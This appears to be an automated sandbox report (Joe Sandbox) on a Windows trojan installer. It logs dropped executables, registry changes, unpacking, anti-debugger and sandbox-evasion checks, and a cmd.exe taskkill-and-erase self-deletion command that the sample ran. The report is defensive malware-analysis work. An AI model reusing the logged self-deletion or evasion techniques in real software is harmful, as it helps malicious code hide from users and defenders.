Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0042E708: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError, 1_2_0042E708
PE file contains executable resources (Code or Archives)
Source: file.exe Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: file.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: file.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: file.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: file.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: file.tmp.0.dr Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: is-S7F6P.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-S7F6P.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-S7F6P.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: is-S7F6P.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-S7F6P.tmp.1.dr Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000003.248123024.00000000024D1000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe, 00000000.00000003.248334642.00000000023E5000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\Split Files\is-S7F6P.tmp C6D9AFBD0C6A415D38F71573FD9B214C927538F53896E0DA3FFE830A991D4485
Source: HitFiles134.exe.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_PRELOAD, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: _RegDLL.tmp.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp "C:\Users\user~1\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp" /SL5="$702C6,1650404,162304,C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Process created: C:\Program Files (x86)\Split Files\HitFiles134.exe "C:\Program Files (x86)\Split Files\HitFiles134.exe"
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\3JCCsnPwg.exe
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "HitFiles134.exe" /f & erase "C:\Program Files (x86)\Split Files\HitFiles134.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "HitFiles134.exe" /f
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp "C:\Users\user~1\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp" /SL5="$702C6,1650404,162304,C:\Users\user\Desktop\file.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Process created: C:\Program Files (x86)\Split Files\HitFiles134.exe "C:\Program Files (x86)\Split Files\HitFiles134.exe" Jump to behavior
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\3JCCsnPwg.exe Jump to behavior
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "HitFiles134.exe" /f & erase "C:\Program Files (x86)\Split Files\HitFiles134.exe" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "HitFiles134.exe" /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004093A8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 0_2_004093A8
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0045476C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 1_2_0045476C
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;HitFiles134.exe&quot;)
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963} Jump to behavior
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user~1\AppData\Local\Temp\is-OVJ5O.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@12/40@0/5
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar, 2_2_00401B30
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00454F94 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA, 1_2_00454F94
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 2_2_00402BF0
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00405350 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification, 2_2_00405350
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2228:120:WilError_01
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409B0C FindResourceA,SizeofResource,LoadResource,LockResource, 0_2_00409B0C
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp File created: C:\Program Files (x86)\Split Files Jump to behavior
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Command line argument: `a}{ 2_2_004096F0
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Command line argument: MFE. 2_2_004096F0
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Command line argument: ZK]Z 2_2_004096F0
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Command line argument: ZK]Z 2_2_004096F0
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Window found: window name: TMainForm Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 1918587 > 1048576

Data Obfuscation
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Unpacked PE file: 2.2.HitFiles134.exe.400000.1.unpack
Detected unpacking (changes PE section rights)
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Unpacked PE file: 2.2.HitFiles134.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;.avh134:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Obfuscated command line found
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp "C:\Users\user~1\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp" /SL5="$702C6,1650404,162304,C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp "C:\Users\user~1\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp" /SL5="$702C6,1650404,162304,C:\Users\user\Desktop\file.exe" Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406518 push 00406555h; ret 0_2_0040654D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00408064 push ecx; mov dword ptr [esp], eax 0_2_00408069
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004040B5 push eax; ret 0_2_004040F1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404185 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404206 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040C218 push eax; ret 0_2_0040C219
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404283 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00408E98 push 00408ECBh; ret 0_2_00408EC3
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_004098B4 push 004098F1h; ret 1_2_004098E9
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_004062CC push ecx; mov dword ptr [esp], eax 1_2_004062CD
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_004583E0 push 00458424h; ret 1_2_0045841C
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00410640 push ecx; mov dword ptr [esp], edx 1_2_00410645
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0040A6C8 push esp; retf 1_2_0040A6D1
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00412898 push 004128FBh; ret 1_2_004128F3
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_004429EC push ecx; mov dword ptr [esp], ecx 1_2_004429F0
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00450ACC push 00450AFFh; ret 1_2_00450AF7
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00456B74 push 00456BACh; ret 1_2_00456BA4
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00492C14 push ecx; mov dword ptr [esp], ecx 1_2_00492C19
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00450C90 push ecx; mov dword ptr [esp], eax 1_2_00450C95
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0045EE34 push ecx; mov dword ptr [esp], ecx 1_2_0045EE38
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0040CF98 push ecx; mov dword ptr [esp], edx 1_2_0040CF9A
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00483278 push ecx; mov dword ptr [esp], ecx 1_2_0048327D
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0040546D push eax; ret 1_2_004054A9
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0040F4F8 push ecx; mov dword ptr [esp], edx 1_2_0040F4FA
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0040553D push 00405749h; ret 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_004055BE push 00405749h; ret 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0040563B push 00405749h; ret 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_004311AD push esi; ret 2_2_004311B6
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_0040F4BB push ecx; ret 2_2_0040F4CE
PE file contains sections with non-standard names
Source: HitFiles134.exe.1.dr Static PE information: section name: .avh134
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0044AC04 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_0044AC04
Source: initial sample Static PE information: section name: .text entropy: 7.2418910532957375
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-CE3AQ.tmp\_isetup\_RegDLL.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-CE3AQ.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp File created: C:\Program Files (x86)\Split Files\is-S7F6P.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-CE3AQ.tmp\_isetup\_iscrypt.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp File created: C:\Program Files (x86)\Split Files\unins000.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp File created: C:\Program Files (x86)\Split Files\HitFiles134.exe Jump to dropped file
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\3JCCsnPwg.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-CE3AQ.tmp\_isetup\_setup64.tmp Jump to dropped file
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00423B7C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_00423B7C
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00423B7C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_00423B7C
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0042414C IsIconic,SetActiveWindow,SetFocus, 1_2_0042414C
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00424104 IsIconic,SetActiveWindow, 1_2_00424104
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_004182F4 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 1_2_004182F4
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_004227CC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 1_2_004227CC
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00417508 IsIconic,GetCapture, 1_2_00417508
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_004815E0 IsIconic,GetWindowLongA,ShowWindow,ShowWindow, 1_2_004815E0
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0044AC04 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_0044AC04
Source: C:\Users\user\Desktop\file.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found evasive API chain (date check)
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetSystemTime,DecisionNodes
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CE3AQ.tmp\_isetup\_RegDLL.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CE3AQ.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Split Files\is-S7F6P.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Split Files\unins000.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CE3AQ.tmp\_isetup\_setup64.tmp Jump to dropped file
Found evasive API chain checking for process token information
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Contains functionality to detect sandboxes (foreground window change detection)
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA, 2_2_004056A0
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409A50 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery, 0_2_00409A50
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_004738D8 FindFirstFileA,FindNextFileA,FindClose, 1_2_004738D8
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00451D34 FindFirstFileA,GetLastError, 1_2_00451D34
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_004960EC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 1_2_004960EC
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00462DD8 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_00462DD8
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00463254 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_00463254
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0046184C FindFirstFileA,FindNextFileA,FindClose, 1_2_0046184C
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, 2_2_00404490
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00423E2D FindFirstFileExW, 2_2_00423E2D
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_1000959D FindFirstFileExW, 2_2_1000959D
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user~1\AppData\Local\Temp\is-OVJ5O.tmp\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user~1\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user~1\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user~1\AppData\Local\Temp\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user~1\AppData\Local\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user~1\AppData\ Jump to behavior
Source: HitFiles134.exe, 00000002.00000002.331832954.00000000017F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: HitFiles134.exe, 00000002.00000002.331582151.00000000017BC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0041336B
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 2_2_00402BF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0044AC04 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_0044AC04
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc, 2_2_00402F20
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_0044028F mov eax, dword ptr fs:[00000030h] 2_2_0044028F
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_0042041F mov eax, dword ptr fs:[00000030h] 2_2_0042041F
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h] 2_2_004429E7
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00417BAF mov eax, dword ptr fs:[00000030h] 2_2_00417BAF
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_100091C7 mov eax, dword ptr fs:[00000030h] 2_2_100091C7
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_10006CE1 mov eax, dword ptr fs:[00000030h] 2_2_10006CE1
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_0040F789 SetUnhandledExceptionFilter, 2_2_0040F789
